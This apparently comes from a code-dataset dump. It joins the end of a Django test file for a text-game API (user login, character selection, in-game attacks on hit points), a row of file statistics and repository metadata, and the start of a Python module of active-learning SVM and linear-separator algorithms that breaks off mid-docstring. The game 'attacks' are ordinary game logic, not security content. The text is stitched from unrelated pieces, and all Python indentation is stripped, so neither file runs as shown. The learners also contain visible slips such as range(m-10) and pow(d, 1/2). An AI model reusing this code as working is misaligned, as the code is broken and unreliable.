assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 2, 'Should be equal'
assert MudUser.objects.get(pk=2).username == 'hello_world02', 'Should be equal'
# log in
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'login_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name04'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01,hello_name03'.encode(), 'Should be same'
# now client USER2 - attack hello_name03 -> hello_name01
insert_data = {'view_name': 'attack_character', 'target_user': 'hello_name01'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert Character.objects.get(name='hello_name01').hp == 90, 'Should be same'
assert response.content == 'Success attack hello_name01 -> hp : 90'.encode(), 'Should be same'
def test_two_character_in_same_room_and_attack_user2_to_user2(self):
client = Client()
# USer 1
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01'.encode(), 'Should be same'
# USER 2
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'create_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 2, 'Should be equal'
assert MudUser.objects.get(pk=2).username == 'hello_world02', 'Should be equal'
# log in
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'login_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name04'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01,hello_name03'.encode(), 'Should be same'
# now client USER2 - attack hello_name03 -> hello_name03
insert_data = {'view_name': 'attack_character', 'target_user': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert Character.objects.get(name='hello_name03').hp == 100, 'Should be same'
assert response.content == 'invalid'.encode(), 'Should be same'
# now client USER2 - attack hello_name03 -> hello_name03
insert_data = {'view_name': 'attack_character', 'target_user': 'hello_name999'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert Character.objects.get(name='hello_name03').hp == 100, 'Should be same'
assert response.content == 'invalid'.encode(), 'Should be same'
def test_two_character_in_same_room_and_big_attack_user2_to_user1(self):
client = Client()
# USer 1
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01'.encode(), 'Should be same'
# USER 2
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'create_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 2, 'Should be equal'
assert MudUser.objects.get(pk=2).username == 'hello_world02', 'Should be equal'
# log in
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'login_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name04'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01,hello_name03'.encode(), 'Should be same'
# now client USER2 - attack hello_name03 -> hello_name01
insert_data = {'view_name': 'attack_character', 'target_user': 'hello_name01'}
attacker = Character.objects.get(name='hello_name03')
attacker.total_attack = 99999
attacker.save()
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
# dead reset hp
assert Character.objects.get(name='hello_name01').hp == 100, 'Should be same'
assert Character.objects.get(name='hello_name01').location_x == 10, 'Should be same'
assert Character.objects.get(name='hello_name01').location_y == 10, 'Should be same'
assert Character.objects.get(name='hello_name01').location_z == 10, 'Should be same'
assert response.content == 'Success attack hello_name01 -> Dead'.encode(), 'Should be same'
| 67.108664 | 116 | 0.662808 | 5,550 | 45,701 | 5.276396 | 0.022162 | 0.095957 | 0.09343 | 0.080522 | 0.974833 | 0.973569 | 0.968686 | 0.963632 | 0.958817 | 0.949392 | 0 | 0.03576 | 0.199646 | 45,701 | 680 | 117 | 67.207353 | 0.764852 | 0.04617 | 0 | 0.904085 | 0 | 0.005329 | 0.386184 | 0.036609 | 0 | 0 | 0 | 0 | 0.472469 | 1 | 0.026643 | false | 0.067496 | 0.007105 | 0 | 0.035524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
faad93ba80c27598c614e19dcd422e0132a0bd23 | 60,650 | py | Python | active_learners.py | Kaushikpatnaik/Active-Learning-and-Best-Response-Dynamics | 3d3cde9c1d755129d065ea77ad610da84852c4ce | [
"MIT"
] | 3 | 2017-01-27T21:24:51.000Z | 2021-01-26T21:41:21.000Z | active_learners.py | Kaushikpatnaik/Active-Learning-and-Best-Response-Dynamics | 3d3cde9c1d755129d065ea77ad610da84852c4ce | [
"MIT"
] | null | null | null | active_learners.py | Kaushikpatnaik/Active-Learning-and-Best-Response-Dynamics | 3d3cde9c1d755129d065ea77ad610da84852c4ce | [
"MIT"
] | 1 | 2017-05-31T09:35:58.000Z | 2017-05-31T09:35:58.000Z | from numpy import *
import numpy.random as nprandom
from scipy.stats import bernoulli
from scipy.stats import norm as normal
from scipy import linalg as lin
import math
import random as rnd
from learners import *
from passive_learners import *
from utilities import *
import gc
#SOLVER = 'sgd'
SOLVER = 'cvxopt'
#SOLVER = 'hard_cvxopt'
#SOLVER = 'svm'
'''
Self implementation of the PassiveSVM
Currently replaced by libsvm for experiments in larger datasets
'''
class PassiveSVM(LinearLearner, ActiveBatchLearner, ActiveSourceLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
# Query the labels of m examples
Y = array([oracle(ids[i]) for i in range(m)]).reshape((m, 1))
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
svm.batch_train(U[:m], Y)
# Use the separator found by SVM
self.w = svm.w
def active_source_train(self, source, oracle, label_budget):
U, ids = source(label_budget)
self.active_batch_train(U, ids, oracle, label_budget)
'''
Implementation of the simple margin procedure in Tong and Koller
'''
class SimpleMarginBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d):
LinearLearner.__init__(self, d, w = None)
self.pointsusage = 0
def active_batch_train(self, U, ids, oracle, label_budget):
m = len(U)
label_budget = min(m, label_budget)
self.pointsusage = label_budget
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
# Query the labels of the first 10 examples
start = min(10, label_budget)
for i in range(label_budget):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
# Run standard SVM on the labeled data
svm = SVM(self.d)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
# Find the unlabeled example with the smallest margin
min_margin = 1000
min_index = 0
for i in range(m-10):
if ids[i] in used:
continue
cur_margin = svm.margin(U[i])
if cur_margin < min_margin:
min_margin = cur_margin
min_index = i
# Query its label
X = vstack((X, U[min_index]))
Y = vstack((Y, array([oracle(ids[min_index])]).reshape((1,1))))
used.add(ids[min_index])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
'''
Implementation of the online version of simple margin procedure in Tong and Koller
'''
class SimpleMarginSource(LinearLearner, ActiveSourceLearner):
def __init__(self, d):
LinearLearner.__init__(self, d, w = None)
def active_source_train(self, source, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
# Query the labels of 10 examples
start = min(10, label_budget)
U, ids = source(start)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
# Run standard SVM on the labeled data
svm = SVM(self.d)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
# Find an unlabeled example with a small margin
min_margin = min(abs(svm.margin(X[i])) for i in range(len(used)))
U, ids = source(1)
while abs(svm.margin(U[0])) >= min_margin:
U, ids = source(1)
# Query its label
X = vstack((X, U[0]))
Y = vstack((Y, array([oracle(ids[0])]).reshape((1,1))))
used.add(ids[0])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
'''
Soft SVM online version of simple margin described in Tong and Koller
'''
class SimpleMarginSoftSVMSource(LinearLearner, ActiveSourceLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
def active_source_train(self, source, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
# Query the labels of 10 examples
start = min(10, label_budget)
U, ids = source(start)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
# Find an unlabeled example with a small margin
min_margin = min(abs(svm.margin(X[i])) for i in range(len(used)))
U, ids = source(1)
while abs(svm.margin(U[0])) >= min_margin:
U, ids = source(1)
# Query its label
X = vstack((X, U[0]))
Y = vstack((Y, array([oracle(ids[0])]).reshape((1,1))))
used.add(ids[0])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
'''
Soft SVM online version of average margin described in Tong and Koller
'''
class AverageMarginSoftSVMSource(LinearLearner, ActiveSourceLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
def active_source_train(self, source, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
# Query the labels of 10 examples
start = min(10, label_budget)
U, ids = source(start)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
# Find an unlabeled example with a small margin
avg_margin = sum(Y[i] * svm.margin(X[i]) for i in range(len(used)))
U, ids = source(1)
while abs(svm.margin(U[0])) >= 0.5 * avg_margin:
U, ids = source(1)
# Query its label
X = vstack((X, U[0]))
Y = vstack((Y, array([oracle(ids[0])]).reshape((1,1))))
used.add(ids[0])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
'''
Batch version of the simple margin soft learner described in Tong and Koller
'''
class SimpleMarginSoftSVMBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
self.initial_sample = 5
def active_batch_train(self, U, ids, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
labeled = []
# Query the labels of some examples
start = min(self.initial_sample, label_budget)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
labeled.append(ids[i])
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
# Find the unlabeled example with the smallest margin
margins = abs(svm.margin(U))
min_margin = inf
min_index = 0
for i in range(len(U)):
if ids[i] in used:
continue
cur_margin = margins[i]
if cur_margin < min_margin:
min_margin = cur_margin
min_index = i
# Query its label
X = vstack((X, U[min_index]))
Y = vstack((Y, array([oracle(ids[min_index])]).reshape((1,1))))
used.add(ids[min_index])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
'''
Batch version of the Max Min Soft SVM learner described in Tong and Koller
'''
class MaxMinMarginSoftSVMBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
self.initial_sample = 5
self.pointsusage = 0
def active_batch_train(self, U, ids, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
labeled = []
self.pointsusage = label_budget
# Query the labels of some examples
start = min(self.initial_sample, label_budget)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
labeled.append(ids[i])
# Create standard SVM object
svm = soft_SVM(self.d, self.C)
# Until the label budget is reached
while len(used) < label_budget:
# Find the unlabeled example with the largest min-margin
max_min_margin = 0
max_index = 0
for i in range(len(U)):
if ids[i] in used:
continue
# Compute the two margins and take the min
cur_margins = []
for label in (-1, 1):
new_X = vstack((X, U[i]))
new_Y = vstack((Y, array([label]).reshape((1,1))))
svm.batch_train(new_X, new_Y)
cur_margin = min(abs(svm.margin(new_X[i])) for i in range(len(new_X)))
cur_margins.append(cur_margin)
cur_min_margin = min(cur_margins)
if cur_min_margin > max_min_margin:
max_min_margin = cur_min_margin
max_index = i
# Query its label
X = vstack((X, U[max_index]))
Y = vstack((Y, array([oracle(ids[max_index])]).reshape((1,1))))
used.add(ids[max_index])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
self.w = svm.w
'''
Batch version of the Ratio Margin Soft SVM learner described in Tong and Koller
'''
class RatioMarginSoftSVMBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
self.initial_sample = 5
self.pointsusage = 0
def active_batch_train(self, U, ids, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
labeled = []
self.pointsusage = label_budget
# Query the labels of some examples
start = min(self.initial_sample, label_budget)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
labeled.append(ids[i])
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
# Until the label budget is reached
while len(used) < label_budget:
# Find the unlabeled example with the largest min-margin-ratio
max_min_margin_ratio = 0
max_index = 0
for i in range(len(U)):
if ids[i] in used:
continue
# Compute the two margins and take the min
cur_margins = []
for label in (-1, 1):
new_X = vstack((X, U[i]))
new_Y = vstack((Y, array([label]).reshape((1,1))))
svm.batch_train(new_X, new_Y)
cur_margin = min(abs(svm.margin(new_X[i])) for i in range(len(new_X)))
cur_margins.append(cur_margin)
margin_ratios = (cur_margins[0] / cur_margins[1],
cur_margins[1] / cur_margins[0])
cur_min_margin_ratio = min(margin_ratios)
if cur_min_margin_ratio > max_min_margin_ratio:
max_min_margin_ratio = cur_min_margin_ratio
max_index = i
# Query its label
X = vstack((X, U[max_index]))
Y = vstack((Y, array([oracle(ids[max_index])]).reshape((1,1))))
used.add(ids[max_index])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
self.w = svm.w
'''
Implementation of Average Margin Soft SVM described in Tong and Koller
'''
class AverageMarginSoftSVMBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
labeled = []
# Query the labels of 10 examples
start = min(10, label_budget)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
labeled.append(ids[i])
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
svm.batch_train(X, Y)
# Until the label budget is reached
while (len(labeled) < label_budget) and (len(used) < len(U)):
# Find an unlabeled example with a small margin
avg_margin = sum(Y[i] * svm.margin(X[i]) for i in range(len(labeled)))
p = len(used)
while abs(svm.margin(U[p])) >= 0.5 * avg_margin:
used.add(ids[p])
p += 1
if p == len(U):
break
if len(used) == len(U):
break
# Query its label
X = vstack((X, U[p]))
Y = vstack((Y, array([oracle(ids[p])]).reshape((1,1))))
labeled.append(ids[p])
used.add(ids[p])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
'''
First Implementation of the base version of the algorithm described in STOC 2014 paper -The power of localization in effectively learning linear separators
Only adverserial noise version
Initialization of parameters based on upper bounds in paper
'''
class LinearSeparatorsNoiseSource(LinearLearner, ActiveSourceLearner):
def __init__(self, d, eps, c1, c2, c3, c4):
LinearLearner.__init__(self, d, w = None)
self.eps = eps
self.c1 = c1
self.c2 = c2
self.c3 = c3
self.c4 = c4
def active_source_train(self, source, oracle, label_budget):
itr = int(log(1/self.eps)/log(2)) - 2
m = zeros((itr+1))
b = zeros((itr+1))
r = zeros((itr+1))
n = zeros((itr+1))
t = zeros((itr+1))
#print itr
# Generator function for mk, bk, rk, nk, tk
for i in range(0,itr+1):
b[i] = self.c1*pow(2,-i) # * pow(self.d,-1/2.0)) # cutoff values
r[i] = self.c2*(pow(2,-i) * pi) # radius cutoff
#n[i] = label_budget/pow(2,itr-i-1) # train is the number of unlabelled examples allowed, this limits the unlabelled samples per iteration of svm <needs to be increase exponentially >
#m[i] = self.c3*(pow(d,2) + d*i)/3 # maxm number of labels allowed
m[i] = self.c3*label_budget/itr
t[i] = self.c4*pow(2,-i) # * pow(self.d,-1/2.0))
#print "reached Generator function in Linear Noise Separators"
# access to the training examples and their labels
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0,1))
c = set()
U, ids = source(int(m[0]))
for i in range(int(m[0])):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape(1,1)))
c.add(ids[i])
#print "sending data to the PCA"
# PCA code for finding the finding the eigenvectors and eigenvalues. <limit data by exp(dim/8), not implemented, does not need to be>
pca = PCA(self.d)
pca.pca_run(X,Y)
self.w = pca.w
# Creating the working set and the temp arrays for the weight update
workingset = []
tempx = array([]).reshape((0,self.d))
k = 1
# populating workingset with m[1]
U, ids = source(int(m[1]))
for i in range(int(m[1])):
workingset.append(ids[i])
tempx = vstack((tempx, U[i]))
while k < itr:
#print "iteration number: "+str(k)
# Creating set for SVM
P = array([]).reshape((0, self.d))
Q = array([]).reshape((0, 1))
# Querying labels, subsampling points from workingset, to get labels for optimization problem
for i in range(int(m[k])):
P = vstack((P, tempx[i]))
Q = vstack((Q, array([oracle(workingset[i])]).reshape(1,1)))
# QP to find w_improved, also need to send rk, tk, wk-1
qp = QP(self.d)
qp.train(P, Q, r[k], t[k], self.w)
self.w = qp.w
# clearing the working set and making tempx zero
workingset = []
tempx = array([]).reshape((0,self.d))
#print 'query additional points from the oracle returning x based on != |w_improved.x| >= bk'
while len(workingset) <= int(m[k+1]):
U, ids = source(1)
if abs(dot(self.w, U[0])) >= b[k]:
continue
else:
workingset.append(ids[0])
tempx = vstack((tempx, U[0]))
k +=1
'''
Implementation of the adverserial noise version of the algorithm described in STOC 2014 paper
Major changes from Method1 are the way the variables are initialized
'''
class LinearNoiseMethod2Source(LinearLearner, ActiveSourceLearner):
def __init__(self, d, eps, c1, c2, c3, c4):
LinearLearner.__init__(self, d, w = None)
self.eps = eps
self.c1 = c1
self.c2 = c2
self.c3 = c3
self.c4 = c4
def active_source_train(self, source, oracle, label_budget):
itr = int(log(1/self.eps)/log(2))+2
#print "total iterations:"+str(itr)
m = zeros((itr+1))
b = zeros((itr+1))
r = zeros((itr+1))
n = zeros((itr+1))
t = zeros((itr+1))
#print itr
# Generator function for mk
for i in range(0,itr+1):
m[i] = label_budget/itr
# Estimating parameters
# access to the training examples and their labels
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0,1))
c = set()
U, ids = source(int(m[0]))
for i in range(int(m[0])):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape(1,1)))
c.add(ids[i])
# learning a more accurate weight vector using the svm algorithm (can be replaced by hinge loss minimization later)
svm = SVM(self.d)
svm.batch_train(X, Y)
tot = 0
avgtot = 0
# Calculating the normalized band of svm
for i in range(int(m[0])):
avgtot += abs(dot(svm.w,X[i])) * 1/(abs(dot(svm.w, X[i])))
tot += 1/abs(dot(svm.w,X[i]))
b = avgtot/tot
r = b * pow(self.d, 1/2) * pi
t = b
#print "cutoff, normalizing factor, radius"
#print b,t,r
# access to the training examples and their labels
tempx = array([]).reshape((0, self.d))
workingset = []
U, ids = source(int(m[1]))
for i in range(int(m[1])):
tempx = vstack((tempx, U[i]))
workingset.append(ids[i])
k=1
while (k < itr):
#print "iteration number: "+str(k)
# Creating set for SVM
P = array([]).reshape((0, self.d))
Q = array([]).reshape((0, 1))
# Querying labels, subsampling points from workingset, to get labels for optimization problem
for i in range(int(m[k])):
P = vstack((P, tempx[i]))
Q = vstack((Q, array([oracle(workingset[i])]).reshape(1,1)))
# QP to find w_improved, also need to send rk, tk, wk-1
qp = QP(self.d)
qp.train(P, Q, r, t, self.w)
self.w = qp.w
tot = 0
avgtot = 0
# Calculating the normalized band of svm
for i in range(int(m[k])):
avgtot += abs(dot(self.w,P[i])) * 1/(abs(dot(self.w, P[i])))
tot += 1/abs(dot(self.w,P[i]))
b = avgtot/tot
r = b * pow(self.d, 1/2) * pi
t = b
# clearing the working set and making tempx zero
workingset = []
tempx = array([]).reshape((0,self.d))
#print "cutoff, normalizing factor, radius"
#print b,t,r
# query additional points from the oracle returning x based on != |w_improved.x| >= b
while len(workingset) <= int(m[k+1]):
U, ids = source(1)
if abs(dot(self.w, U[0])) >= b:
continue
else:
workingset.append(ids[0])
tempx = vstack((tempx, U[0]))
k +=1
'''
Batch version of the base implementation
'''
class LinearSeparatorsNoiseBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d, eps, c1, c2, c3, c4):
LinearLearner.__init__(self, d, w = None)
self.eps = eps
self.c1 = c1
self.c2 = c2
self.c3 = c3
self.c4 = c4
def active_batch_train(self, U, ids, oracle, label_budget):
itr = int(log(1/self.eps)/log(2)) - 2
m = zeros((itr+1))
b = zeros((itr+1))
r = zeros((itr+1))
n = zeros((itr+1))
t = zeros((itr+1))
count = len(U) # Here U is set to a fraction of the dataset
# Generator function for mk, bk, rk, nk, tk
for i in range(0,itr+1):
b[i] = self.c1*pow(2,-i) # * pow(self.d,-1/2.0)) # cutoff values
r[i] = self.c2*(pow(2,-i) * pi) # radius cutoff
m[i] = int(self.c3*label_budget/itr)
t[i] = self.c4*pow(2,-i) # * pow(self.d,-1/2.0))
# access to the training examples and their labels
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0,1))
used = set()
for i in range(int(m[0])):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape(1,1)))
used.add(ids[i])
# PCA code for finding the finding the eigenvectors and eigenvalues. <limit data by exp(dim/8), not implemented, does not need to be>
pca = PCA(self.d)
pca.pca_run(X,Y)
self.w = pca.w
# Creating the working set and the temp arrays for the weight update
workingset = []
tempx = array([]).reshape((0,self.d))
k = 1
use_count = len(used)
# populating workingset with m[1]
for i in range(int(m[1])):
workingset.append(ids[use_count+i])
tempx = vstack((tempx, U[use_count+i]))
used.add(ids[use_count+i])
while (k < itr) and (len(used) < len(U)):
#print 'iteration number, margin, norm, radius :'
#print str(k),str(b[k]),str(t[k]),str(r[k])
#print " datapoints used, datapints sampled"
#print len(workingset), len(used)
# Creating set for SVM
P = array([]).reshape((0, self.d))
Q = array([]).reshape((0, 1))
# Querying labels, subsampling points from workingset, to get labels for optimization problem
for i in range(int(m[k])):
P = vstack((P, tempx[i]))
Q = vstack((Q, array([oracle(workingset[i])]).reshape(1,1)))
# QP to find w_improved, also need to send rk, tk, wk-1
qp = QP(self.d)
qp.train(P, Q, r[k], t[k], self.w)
self.w = qp.w
'''
# You will operate in k-1 space, for k=2 you are looking at the difference between k=1 self.w and k=2 self.w
if k > 1:
dis_disregion =0.0
dis_aggregion =0.0
